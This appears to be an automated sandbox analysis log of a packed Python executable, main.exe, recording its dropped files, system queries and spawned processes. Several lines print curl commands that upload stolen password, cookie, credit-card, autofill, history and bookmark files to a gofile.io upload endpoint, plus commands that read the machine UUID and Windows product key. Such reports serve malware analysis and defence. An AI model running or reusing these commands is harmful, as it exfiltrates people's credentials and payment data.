Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_eksblowfish.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\win32ui.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2s.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed25519.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2b.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_arc2.pyd
Source: C:\Users\user\Desktop\main.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_0-18427)
Source: C:\Windows\System32\curl.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\curl.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00007FF6ABA48840 FindFirstFileExW,FindClose
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00007FF6ABA47800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00007FF6ABA62AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: curl.exe, 0000000E.00000002.1844245274.000001EB2E898000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
Source: main.exe, 00000002.00000003.1950132310.000001ED8C1DD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1770547519.000001ED8C1C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924390284.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1776491892.000001ED8C1C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1768763930.000001ED8C1C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1915129551.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1774768079.000001ED8C1C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1763094156.000001ED8C1C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1773385102.000001ED8C1C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1771560505.000001ED8C1C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1769577531.000001ED8C1C5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWj
Source: curl.exe, 00000012.00000002.1848444112.000001AA5BB48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: curl.exe, 00000006.00000002.1837095116.00000149D0428000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: curl.exe, 00000008.00000002.1838633812.0000015BF1EE8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: curl.exe, 0000000C.00000002.1841492318.0000028089D59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000010.00000002.1846245734.0000027103518000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
Source: C:\Users\user\Desktop\main.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00007FF6ABA4C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00007FF6ABA646F0 GetProcessHeap
Source: C:\Users\user\Desktop\main.exe | Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00007FF6ABA4C8A0 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00007FF6ABA4BE60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00007FF6ABA5B558 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_00007FF6ABA6A7E0 cpuid
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\MarkupSafe-3.0.2.dist-info VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\certifi VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info\licenses VolumeInformation
Source: C:\Users\user\Desktop\main.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\h2-4.1.0.dist-info VolumeInformation
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\ossl-modules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\certifi VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\h2-4.1.0.dist-info VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3-x64.dll VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3.dll VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\libffi-8.dll VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\libssl-3.dll VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\markupsafe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\MarkupSafe-3.0.2.dist-info VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\ossl-modules VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\psutil VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\pyexpat.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\python3.dll VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\setuptools-65.5.0.dist-info VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\sqlite3.dll VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140_1.dll VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32com VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_cffi_backend.cp311-win_amd64.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_elementtree.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_uuid.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformationJump to behavior
